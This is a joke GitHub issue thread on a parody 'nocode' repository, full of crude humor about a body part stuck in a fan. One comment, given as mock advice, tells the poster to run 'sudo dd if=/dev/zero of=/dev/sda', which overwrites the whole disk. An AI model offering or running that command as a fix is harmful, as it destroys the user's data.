### ISSUE TITLE
dick got stuck in fan

### ISSUE THREAD

**Issue by parathi0n** [kelseyhightower/nocode#2523]
while writing no code my dick got stuck in the fan pls help

do i need do make: sudo ipt fan_disable?

**Comment by fluiz** [comment]
Reading the docs it seems that you should do:
`

`

And then check for this output:
`

`

Hope it helps

**Comment by rickteuthof** [comment]
No, try `sudo dd if=/dev/zero of=/dev/sda`

**Comment by YoYoYonnY** [comment]
@rickteuthof Agreed, bug poster probably still has stray code sitting around on his hard drive.

**Comment by JesseTG** [comment]
Instructions unclear, wound up filling my hard drive with code.

**Comment by Sharondio** [comment]
Sounds like user error. Move to close.

**Comment by mjrb** [comment]
directions unclear dick also stuck in hard drive
